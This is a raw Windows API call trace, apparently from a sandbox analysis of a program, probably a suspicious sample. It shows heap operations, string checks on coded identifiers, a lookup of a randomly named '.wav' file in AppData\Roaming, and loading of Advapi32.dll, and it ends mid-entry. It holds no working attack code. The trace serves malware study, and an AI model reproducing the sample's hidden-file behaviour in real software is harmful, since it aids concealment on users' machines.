0x24a9f90 [0196.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0196.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0196.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CoTbYkKe.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oTbYkKe.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TbYkKe.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bYkKe.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YkKe.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kKe.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ke.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.024] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0196.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0196.024] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0196.024] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0196.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0196.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0196.024] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0196.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0196.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0196.024] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0196.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.025] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0196.025] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.025] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.025] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.025] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.025] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.025] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/CoTbYkKe.wav", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cddf390, ftCreationTime.dwHighDateTime=0x1d4d19a, ftLastAccessTime.dwLowDateTime=0x4f0dd5b0, ftLastAccessTime.dwHighDateTime=0x1d4c9b4, ftLastWriteTime.dwLowDateTime=0x4f0dd5b0, ftLastWriteTime.dwHighDateTime=0x1d4c9b4, nFileSizeHigh=0x0, nFileSizeLow=0x1f6a, dwReserved0=0x9fb0039, dwReserved1=0x12466, cFileName="CoTbYkKe.wav", cAlternateFileName="")) returned 0xaa5660 [0196.026] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0196.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0196.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.026] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0196.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0196.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0196.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0196.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0196.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.028] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.028] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0196.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0196.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0196.028] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0196.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.029] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0196.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.029] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.029] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0196.029] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa248 [0196.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.030] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0196.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.041] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.042] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.042] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.070] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0196.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.071] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0196.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.071] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.072] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.072] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0196.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1778 [0196.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0196.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0196.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 